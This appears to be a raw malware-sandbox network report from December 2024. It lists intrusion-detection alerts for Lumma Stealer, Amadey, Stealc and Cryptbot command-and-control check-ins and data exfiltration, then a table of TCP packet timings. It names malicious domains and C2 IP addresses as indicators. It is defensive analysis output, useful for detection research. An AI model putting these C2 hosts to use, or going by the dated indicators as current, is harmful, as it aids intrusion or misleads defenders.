                                                                                                                                                                                                                                                            2024-12-21T22:17:27.896588+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449863185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:30.181424+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449872185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:31.312279+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449868104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:31.312279+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449868104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:31.755975+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44987431.41.244.1180TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:35.345292+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449880104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:35.345292+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449880104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:38.312560+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449879104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:38.312560+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449879104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:40.863780+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449894104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:40.863780+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449894104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:43.406299+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449896185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:45.140592+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44989831.41.244.1180TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:46.292957+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.449899185.121.15.19280TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:47.565868+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449893185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:48.628640+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449902104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:48.628640+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449902104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:49.585282+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449893185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:49.751331+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.449903185.121.15.19280TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:51.416340+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449893185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:52.392375+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449906185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:53.102897+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449893185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:53.896569+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44990731.41.244.1180TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:54.976425+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449911104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:54.976425+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449911104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:55.764367+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449911104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:56.888364+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449893185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:57.375083+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449915104.21.67.146443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:58.035506+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.4640301.1.1.153UDP
                                                                                                                                                                                                                                                            2024-12-21T22:17:58.042521+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449915104.21.67.146443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:58.042521+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449915104.21.67.146443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:58.199550+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.4602671.1.1.153UDP
                                                                                                                                                                                                                                                            2024-12-21T22:17:58.217073+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449893185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:59.248914+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449918185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:59.914617+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449922104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:17:59.914617+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449922104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:00.662253+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449922104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:00.662253+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449922104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:00.679982+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449927104.21.67.146443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:00.718394+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44992631.41.244.1180TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:01.451781+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449927104.21.67.146443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:01.451781+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449927104.21.67.146443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:02.026185+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449928104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:02.026185+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449928104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:02.789642+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449928104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:02.789642+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449928104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:05.271328+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449923212.193.31.880TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:05.654784+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449942104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:05.654784+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449942104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:05.668911+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449942104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:06.049863+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449943185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:06.241033+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449944104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:06.241033+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449944104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:06.763276+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449946185.215.113.1680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:07.524363+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44994831.41.244.1180TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:08.233108+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449949104.21.67.146443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:09.316077+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449949104.21.67.146443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:10.903858+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449953104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:10.903858+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449953104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:11.107174+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449954104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:11.107174+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449954104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:11.679610+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449953104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:11.982641+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449956104.21.67.146443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:12.741229+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449957104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:12.741229+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449957104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:13.137571+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449958185.215.113.1680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:13.599031+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449959104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:13.599031+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449959104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:16.371503+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449962104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:16.371503+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449962104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:17.150195+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449962104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:17.278669+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449964104.21.67.146443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:18.462501+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449965185.215.113.1680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:19.436842+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449966185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:20.332894+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449969104.21.67.146443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:20.497392+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449967185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:21.017248+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44997031.41.244.1180TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:25.942383+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449959104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:26.142310+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449984104.21.67.146443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:27.886023+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449987104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:27.886023+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449987104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:28.160583+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449988185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:29.418263+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449990104.21.67.146443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:30.160080+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449989185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:30.194858+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449990104.21.67.146443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:30.983410+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.449995104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:30.983410+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449995104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:32.431798+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449999104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:33.030792+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449998185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:33.182776+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449999104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:33.182776+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449999104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:34.491864+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450006104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:35.113633+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450007104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:35.113633+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450007104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:35.123295+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.450007104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:35.520206+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450006104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:35.520206+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450006104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:36.873881+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450008185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:39.117003+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.450005TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:39.217141+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450020104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:39.217141+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450020104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:40.008437+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450020104.21.21.99443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:40.383069+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450034104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:40.409840+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.450031185.121.15.19280TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:40.480180+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450033185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:41.850101+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450044185.215.113.1680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:42.759047+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450051104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:45.427523+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450055104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:46.144838+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450056185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:48.031137+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450059104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:48.802657+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450059104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:52.044070+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450060185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:58.404289+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450062185.215.113.20680TCP
                                                                                                                                                                                                                                                            2024-12-21T22:18:58.521230+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450064185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:02.629579+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450066104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:03.903392+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.450066104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:05.798211+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450068104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:06.583713+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450068104.21.91.209443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:07.712276+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450070185.215.113.4380TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:09.966852+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.450079172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:09.966852+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450079172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:10.727269+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450079172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:10.727269+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450079172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:12.881418+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.450082172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:12.881418+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450082172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:13.629243+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450082172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:13.629243+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450082172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:19.434577+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.450091172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:19.434577+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450091172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:22.134489+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.450094172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:22.134489+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450094172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:23.077294+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450094172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:24.699901+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.450096172.67.209.202443TCP
                                                                                                                                                                                                                                                            2024-12-21T22:19:24.699901+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450096172.67.209.202443TCP
                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:03.823276043 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:03.942972898 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:03.943098068 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:03.943247080 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:04.063044071 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:05.303036928 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:05.306446075 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:06.812927961 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:06.813196898 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:06.933573008 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:06.933682919 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:06.933722973 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:06.933794022 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:06.933882952 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:07.053540945 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.298841953 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.298918009 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.298976898 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.299030066 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.536870956 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.536983967 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.540440083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.660166025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.660238028 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.660515070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.780323029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.986558914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.986624956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.986800909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.986838102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.986856937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.986872911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.986891031 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.986923933 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987010002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987044096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987059116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987078905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987093925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987128973 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987685919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987720013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987735987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987756014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987767935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987807035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:10.106225014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:10.106291056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:10.106334925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:10.106380939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:10.110464096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:10.110515118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:10.110543013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:10.110596895 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:10.178756952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:10.178831100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:10.179037094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:10.179096937 CET4977080192.168.2.431.41.244.11
